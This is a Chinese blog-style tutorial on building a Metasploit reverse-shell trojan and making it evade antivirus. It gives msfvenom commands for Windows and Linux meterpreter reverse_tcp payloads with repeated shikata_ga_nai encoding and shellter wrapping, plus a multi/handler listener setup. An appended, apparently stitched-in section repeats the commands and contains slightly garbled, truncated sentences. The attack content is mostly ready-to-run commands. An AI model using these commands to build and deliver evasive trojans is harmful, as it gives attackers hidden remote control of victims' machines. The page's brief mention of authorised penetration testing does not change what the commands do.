msf反弹木马之免杀

原理

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

准备

win7靶机 ip :192.168.56.130
kali攻击机 ip: 192.168.56.135

##实战开始
1.打开kali机,在命令行输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe

LHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。
lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?
> 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。
-e x86/shikata_ga_nai 为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码
-i 5为使用刚才设定的编码方式对目标进行5次编码

2.命令行输入

shellter

第一个选项选择Aimage.png

3.PE Target 后面填写/home/kali/Desktop/1.exe,即木马所在路径。
然后等待一段时间······

### 使用 Metasploit Framework 创建木马的技术信息 Metasploit Framework (MSF) 是一款强大的开源渗透测试工具,能够用于创建木马并进行处理。以下是关于如何使用 MSF 创建木马的详细技术信息: #### 1. **生成木马的基本命令** `msfvenom` 是 Metasploit 中专门用于生成木马的工具。它可以通过指定目标平台、有效载荷(payload)、编码器等参数来生成适合不同场景的木马文件。 基本命令格式如下: ```bash msfvenom -p <payload> LHOST=<本地IP> LPORT=<本地端口> -f <输出格式> -o <输出文件> ``` - `-p`:指定要使用的 payload。 - `LHOST`:设置监听的本地 IP 地址。 - `LPORT`:设置监听的本地端口号。 - `-f`:指定输出文件的格式(如 exe、dll、raw 等)。 - `-o`:指定生成木马文件的保存路径和名称[^3]。 #### 2. **常用 Payload 示例** 以下是一些常见的 payload 和其适用场景: - **Windows 反弹 Shell**: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe ``` 此命令生成一个适用于 Windows 系统的 Meterpreter 反弹 Shell,目标主机运行后会连接到攻击者的 IP 地址和端口[^3]。 - **Linux 反弹 Shell**: ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell.elf ``` 此命令生成一个适用于 Linux 系统的反弹 Shell 文件。 #### 3. **对木马进行编码以实现** 为了绕过目标系统的毒软件检测,可以使用编码器对生成的木马进行处理。例如: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe ``` - `-e`:指定编码器,`x86/shikata_ga_nai` 是一种常用的编码器。 - `-i`:指定编码迭代次数,增加复杂度以提高效果[^1]。 #### 4. **启动监听服务** 生成木马后,需要在攻击机上启动监听服务以接收目标主机的连接。可以使用 `msfconsole` 完成此操作: ```bash use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit ``` 以上命令将配置一个 handler 模块,等待目标主机运行木马后建立连接[^3]。 #### 5. **注意事项** - 确保攻击机和目标机之间的网络连通性。 - 使用合法授权进行渗透测试,避非法行为。 - 根据目标环境选择合适的 payload 和编码器[^5]。 --- ### 示例代码 以下是一个完整的示例,展示如何生成一个简单的 Windows 反弹 Shell 并启动监听: ```bash # 生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o shell.exe # 启动监听 msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit ``` ---
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值